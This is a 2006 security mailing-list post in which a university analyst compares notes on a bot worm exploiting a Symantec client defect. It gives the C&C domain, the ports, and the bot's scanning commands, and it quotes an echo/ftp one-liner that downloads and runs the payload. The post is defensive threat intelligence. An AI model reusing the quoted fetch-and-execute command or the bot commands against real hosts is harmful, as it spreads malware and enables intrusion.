[unisog] Worm exploiting Symantec client defect?????
eckman at umn.edu
Mon Nov 27 23:41:24 GMT 2006
We might have a slightly different variant, because I've seen some
differences in activity related to this. I'll send out a slightly edited
version of what I sent out here to internal staff in just a few...
Cam Beasley wrote:
> - a reptile bot it seems
> - uses VMware and debugger detection
> - IRC Based C&C with a modified version of UnrealIRCD
> - Ops go by god and G00D
> - the botnet controller was at 184.108.40.206:6667
> but just recently jumped to 220.127.116.11:6667
The C&C is www.flackware.info:6667/tcp. Those IP addresses were what
that RR resolved to at given points in time.
> - initial attack vectors target tcp/2967 & tcp/6236
2967/tcp I can confirm. 6236/tcp is involved, but a packet capture
showed an infected host running a cmd.exe shell on that port, so I think
that this isn't "attacking" folks via that port, per se.
> - compromised hosts participate in a NetBIOS & VNC scan of
> local networks
I haven't seen this activity. I suspect the ones that were seen doing
this were told to do so by the C&C, and that our infections took place
at a time where the C&C was giving different instructions.
> - common bot commands are:
> .asc -S -s
> .asc mass445 100 5 0 -b -r -e -h
> .asc rtvscan 100 5 0
> - malcode is transferred thusly:
> echo open X.X.X.X 2100 > i&echo user 1 1 > > i
> &echo get w32svc.exe > > i &echo quit > > i &ftp
> -As:i &w32svc.exe &exit
> - w32svc.exe is dumped to C:\Program Files\Symantec AntiVirus
w32svc.exe may have been dumped there (the cmd.exe shell bound to
6236/tcp that I saw had C:\Program Files\Symantec AntiVirus as the
working directory), but I've been seeing it installed to %WINDIR%. It is
then removed from the initial location.
> - Symantec wasn't identifying the malcode 'w32svc.exe' the
> last time i checked..
The Rapid Release defs released before this post do detect it and do a
wonderful job of removal. The defs are 11/27/2006 rev.50.
Thanks for pointing this out Cam!
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
More information about the unisog